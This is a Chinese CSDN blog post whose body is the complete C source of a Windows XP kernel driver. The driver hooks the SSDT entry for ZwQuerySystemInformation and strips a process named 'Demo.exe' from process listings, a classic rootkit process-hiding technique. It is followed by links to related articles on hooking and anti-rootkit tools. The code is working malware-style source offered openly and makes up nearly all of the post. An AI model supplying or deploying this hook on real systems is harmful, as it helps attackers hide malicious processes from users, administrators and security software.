新版XP下Hook SSDT隐藏进程

最新推荐文章于 2024-03-27 09:50:57 发布
最新推荐文章于 2024-03-27 09:50:57 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 软件安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjz1409276/article/details/17060475
版权 
// 网上的代码里,很多函数都是很早之前的,像什么MmCreateMdlMmMapLockedPages啊,现在早已被废弃。所以想自己写个。蓝了几十次,OMG
// 隐藏名称为Demo.exe的进程
#ifdef __cplusplus
extern "C"
{
#endif

#include <ntddk.h>

#pragma pack(1)
typedef struct ServiceDescriptorEntry
{
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase; //Used only in checked build
    unsigned int NumberOfServices;
    unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

typedef struct _SYSTEM_PROCESS_INFORMATION
{
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    LARGE_INTEGER SpareLi1;
    LARGE_INTEGER SpareLi2;
    LARGE_INTEGER SpareLi3;
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    KPRIORITY BasePriority;
    HANDLE UniqueProcessId;
    HANDLE InheritedFromUniqueProcessId;
    ULONG HandleCount;
    ULONG SessionId;
    ULONG_PTR PageDirectoryBase;
    SIZE_T PeakVirtualSize;
    SIZE_T VirtualSize;
    ULONG PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER ReadOperationCount;
    LARGE_INTEGER WriteOperationCount;
    LARGE_INTEGER OtherOperationCount;
    LARGE_INTEGER ReadTransferCount;
    LARGE_INTEGER WriteTransferCount;
    LARGE_INTEGER OtherTransferCount;
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;;

extern ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
NTKERNELAPI NTSTATUS ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength );

typedef NTSTATUS( *ZWQUERYSYSTEMINFORMATION )( ULONG SystemInformationCLass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength );
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
PMDL  pMdlSSDT = NULL;
PVOID* pMapSSDT = NULL;

ULONG GetSysFuncIndex( ULONG pFunc )
{
    // 计算方法参考:http://blog.csdn.net/yjz1409276/article/details/17049417
    return *( PULONG )( ( PUCHAR )pFunc + 1 );
}

ULONG GetSysFuncAddr( ULONG pFunc )
{
    ULONG FuncIndex = GetSysFuncIndex( pFunc );
    return *( ( ( PULONG ) * KeServiceDescriptorTable.ServiceTableBase ) + FuncIndex );
}

ULONG HookSysFunc( ULONG pSysFunc, ULONG pNewFunc )
{
    KdPrint( ( "Enter HookSysFunc/n" ) );
    __try
    {
        PULONG pSysAddr = ( PULONG )( pMapSSDT ) + GetSysFuncIndex( pSysFunc );
        return InterlockedExchange( ( PLONG )pSysAddr , ( ULONG )pNewFunc );
    }
    __except ( EXCEPTION_EXECUTE_HANDLER )
    {
        KdPrint( ( "HookSysFunc Occurred Exception/n" ) );
    }
}

ULONG UnHookSysFunc( ULONG pSysFunc, ULONG pOldFunc )
{
    KdPrint( ( "Enter UnHookSysFunc/n" ) );
    __try
    {
        PULONG pSysAddr = ( PULONG )( pMapSSDT ) + GetSysFuncIndex( pSysFunc );
        return InterlockedExchange( ( PLONG )pSysAddr , ( ULONG ) pOldFunc );
    }
    __except ( EXCEPTION_EXECUTE_HANDLER )
    {
        KdPrint( ( "UnHookSysFunc Occurred Exception/n" ) );
    }
    return 0;
}

VOID DriverUnload( IN PDRIVER_OBJECT DriverObject )
{
    KdPrint( ( "Enter DriverUnload/n" ) );
    
    UnHookSysFunc( ( ULONG )ZwQuerySystemInformation, ( ULONG )OldZwQuerySystemInformation );
    
    if ( NULL != pMdlSSDT )
    {
        MmUnmapLockedPages( pMapSSDT, pMdlSSDT );
        IoFreeMdl( pMdlSSDT );
    }
}

NTSTATUS NewZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength )
{
    KdPrint( ( "Enter NewZwQuerySystemInformation/n" ) );
    
    NTSTATUS ntStatus;
    
    ntStatus = ( ( ZWQUERYSYSTEMINFORMATION )( OldZwQuerySystemInformation ) )( SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength );
    
    if ( NT_SUCCESS( ntStatus ) )
    {
        if ( SystemInformationClass == 5 )
        {
            PSYSTEM_PROCESS_INFORMATION curr = ( PSYSTEM_PROCESS_INFORMATION )SystemInformation;
            PSYSTEM_PROCESS_INFORMATION prev = NULL;
            UNICODE_STRING hideName;
            RtlInitUnicodeString( &hideName, L"Demo.exe" );
            while ( curr )
            {
                if ( curr->ImageName.Buffer != NULL )
                {
                    if ( 0 == RtlCompareUnicodeString( &curr->ImageName, &hideName, FALSE ) )
                    {
                        if ( prev ) // Middle or Last entry
                        {
                            if ( curr->NextEntryOffset )
                                prev->NextEntryOffset += curr->NextEntryOffset;
                            else	// we are last, so make prev the end
                                prev->NextEntryOffset = 0;
                        }
                        else
                        {
                            if ( curr->NextEntryOffset )
                            {
                                // we are first in the list, so move it forward
                                SystemInformation = ( PCHAR )SystemInformation + curr->NextEntryOffset;
                            }
                            else // we are the only process!
                                SystemInformation = NULL;
                        }
                    }
                }
                prev = curr;
                if ( curr->NextEntryOffset )
                    ( curr = ( PSYSTEM_PROCESS_INFORMATION )( ( PCHAR )curr + curr->NextEntryOffset ) );
                else
                    curr = NULL;
            }
        }
    }
    return ntStatus;
}

NTSTATUS DefaultHandler( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
    KdPrint( ( "Enter DefaultHandler/n" ) );
    
    Irp->IoStatus.Status = STATUS_NOT_SUPPORTED;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest( Irp, IO_NO_INCREMENT );
    return Irp->IoStatus.Status;
}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING  RegistryPath )
{
    KdPrint( ( "Enter DriverEntry/n" ) );
    
    for ( int i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++ )
    {
        DriverObject->MajorFunction[i] = DefaultHandler;
    }
    
    DriverObject->DriverUnload  = DriverUnload;
    
    __try
    {
        OldZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetSysFuncAddr( ( ULONG )ZwQuerySystemInformation );
        pMdlSSDT = IoAllocateMdl( ( PULONG ) * KeServiceDescriptorTable.ServiceTableBase,
                                  KeServiceDescriptorTable.NumberOfServices * 4, FALSE, FALSE, NULL );
        if ( NULL == pMdlSSDT )
        {
            return STATUS_UNSUCCESSFUL;
        }
        MmBuildMdlForNonPagedPool( pMdlSSDT );
        pMdlSSDT->MdlFlags |= MDL_MAPPED_TO_SYSTEM_VA;
        pMapSSDT = ( PVOID* )MmMapLockedPagesSpecifyCache( pMdlSSDT, KernelMode, MmNonCached, NULL, FALSE, HighPagePriority );
        if ( NULL == pMapSSDT )
        {
            return STATUS_UNSUCCESSFUL;
        }
        
        HookSysFunc( ( ULONG )ZwQuerySystemInformation , ( ULONG )NewZwQuerySystemInformation );
        return STATUS_SUCCESS;
    }
    __except ( EXCEPTION_EXECUTE_HANDLER )
    {
    
    }
    return STATUS_UNSUCCESSFUL;
    
}

#ifdef __cplusplus
}
#endif

红色代码
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XP_HOOK 插件案例.zip
08-22
XP_HOOK 插件案例,对应博客文章学习
定制Xposed框架(干货)
热门推荐
世界美景的博客
11-26 1万+
由于很多APP开始针对XP做对应的检测如微信 支付宝 钉钉等 有几种方式进行隐藏 常见检测方法 一. 由于Xposed的hook,是通过so修改被hook的方法为native来实现的,所以检测方也可以通过检测方法是否变成了native来达到检测的目的  Throwable.class.getDeclaredMethod(“getStackTrace” 是否Nativ方法 二. StackTrac...
Xposed hook框架安装
weixin_42156283的博客
02-18 1061
需要提前准备: 1.夜神模拟器Android4.4版本 2.eclipse安装:配置好jdk, sdk目录 Xposed hook框架安装过程 1.下载xposed框架 打开https://repo.xposed.info/module/de.robv.android.xposed.installer 下载de.robv.android.xposed.installer_v33_36570c.ap...
xposed hook 简单教程
蜂蜜_柚子茶的博客
12-06 8400
一、准备: 1、root手机一部(夜神模拟器) 2、Android studio 二、创建Android studio项目 1、创建项目 2、Module根目录下创建lib文件夹(注意是lib文件夹,不是libs) 3、拷贝XposedBridgeApi-54.jar问价到lib文件夹内 4、项目引入XposedBridgeApi-54.jar包,注:需将implementation...
xp hook 自定义类_使Windows XP在经典登录屏幕上使用自定义主题
cuma1988的博客
10-04 167
xp hook 自定义类This article was written by our excellent reader Leon Steadman. 本文由我们的优秀读者Leon Steadman撰写。 In a previous article, we covered how to customize the logon screen for Windows XP, but that meth...
RING0.rar_ring0_ring0 c++_ssdt_进程 隐藏 检测_隐藏进程
07-14
在IT领域,特别是系统安全和恶意软件分析方面,"RING0.rar_ring0_ring0 c++_ssdt_进程 隐藏 检测_隐藏进程"这个标题涉及到一系列关键概念和技术,包括Ring0级别、C++编程、系统服务描述表(SSDT)以及进程隐藏与检测...
IceLight V1.3.44[一线光-无驱,恢复SSDT,可杀IS,SS]
04-04
系统 <br>1,进程\线程中增加了挂起与恢复功能, 2,不使用驱动,通杀隐藏进程,侦测伪PID,查看、恢复SSDT 3,具有网络查看,服务,检测功能. <br>三.自启动 <br>这是一个新增的模块区域,主要用来管理系统中...
PowerTool4.1
11-24
所有进程的枚举(包括内核中隐藏进程) 2. 所有文件的枚举( 包括内核中隐藏的文件) 3. 进程中所有模块的枚举(包括内核中隐藏的模 块) 4. 进程的强制结束 5. 进程中模块的强制卸载 6. 模块被哪 些进程加载...
XT3.9免费下载
08-25
3.最近比较忙,虽然本人在各系统里(2000/xp/2003/vista/2008)经过了仔细的测试,但还是难免有疏忽的地方 致谢: 感谢angel13th、backway、dl123100、曲中求、tawny2008、wolfwalk888(字母序排列)卓有成效的测试...
XueTr0.27 (比冰刃IceSword还强的软件)
07-06
修正xp无补丁版本Shadow SSDT无法显示Bug 10.还有若干小改动,不表 2009-03-22 0.23版本: 1.消息钩子部分加入了线程Id和模块名的显示 2.端口部分对远程端口支持显示IP所在地(需要在XT所在目录下放置一个...
Xposed框架hook安卓接口
05-01
NULL 博文链接:https://icesort.iteye.com/blog/2397799
安卓逆向——Xposed插件常用HOOK方法
含笑
08-23 9064
1. hook 普通静态方法 jadx 反编译分析查看代码,找到需要hook的类和方法 Xposed 插件的写法 // 判断 当前的 启动的模板程序是否是 需要hook的 应用,这里要知道 应用的报名 // 如果不判断指定 报名 启动 插件的话,打开所有的应用都会 启动插件,就会保存,其他的应用 不一定用这个指定方法 if(loadPackageParam.packageName.equals("com.qianyu.helloworld")) { ..
初步认识MDL
chenyujing1234的专栏
12-17 1万+
一、 内存描述符列表 (MDL) 是一个系统定义的结构,通过一系列物理地址描述缓冲区。执行直接 I/O 的驱动程序从 I/O 管理器接收一个 MDL 的指针,并通过 MDL 读写数据。一些驱动程序在执行直接 I/O 来满足设备 I/O 控制请求时也使用 MDL。 驱动程序编写人员不应该假设 MDL 描述的内存页的顺序或内容。驱动程序不得依赖于 MDL 指向的任何位置的数据值,并且不应该直接取消
Android逆向分析之Xposed的hook技术
jiaonizuoren的博客
04-29 751
Android逆向工程里常用到的工具除了的dex2jar,jd-gui, Apktool之外还有一个Xposed。 这个工具是一个在不修改APK的情况下,影响其运行过程的服务框架。可以根据自己的需求编写模块,让模块控制目标应用的运行。 因为本人也是新手,对于Xposed用法还有很多的不熟悉,所以只对其hook技术进行简单的介绍,并让hook技术应用到以后的逆向分析工程中。 至于什么是hook...
探索技术新星:XposedHook - 动态 Hook 的强大工具
最新发布
gitblog_00072的博客
03-27 296
探索技术新星:XposedHook - 动态 Hook 的强大工具 项目地址:https://gitcode.com/shuihuadx/XposedHook 项目简介 XposedHook 是一个基于 Android 平台的框架,它允许开发者在不修改 APK 文件的情况下影响应用的行为。此项目的精髓在于其强大的动态 Hook 能力,使得对应用程序进行调试、性能优化或功能扩展变得更加灵活和方便。 ...
基于xposed框架hook使用
zhangjianming2018的博客
06-16 4136
我不怕千万人阻挡,只怕自己投降。
四种方法实现VC枚举系统当前进程
weixin_33912445的博客
08-30 280
    在Windows 2000以上的MS操作系统,通过Windows的任务管理器可以列出当前系统的所有活动进程(如图1所示),在Windows XP中,更是在控制台下增加了一条Tasklist命令,让系统下的所有进程无所遁行(如图2所示)。这一切是怎么实现的呢?  图 1  图 2 引用侯捷大师在《深入浅出MFC》的一句话,“知其然而不知其所以然,真不是个好办法”。既然如此,我们干脆自己...
[原创]一个简单的windows HOOK - 隐藏进程管理器中特定的进程
享受开发,颠倒银河
09-07 4957
一个简单的windows HOOK - 隐藏进程管理器中特定的进程 (适用平台:windows 2000 sp4,windows XP sp2)         屏蔽任务管理器中的进程名称有很多种方法,可以在ring0级做文章:修改内核进程链表,拦截内核API等。我这里只给出win32下的实现,原理是最普通的 windows 钩子机制。实现语言 win32 汇编 (masm32
SSDTHook技术解析:进程隐藏与保护
"进程隐藏进程保护的技术探讨,主要聚焦于SSDTHook的实现方法" 在计算机编程领域,进程隐藏进程保护是安全和逆向工程中的重要话题。本资源详细介绍了利用System Service Descriptor Table (SSDT) Hook来实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值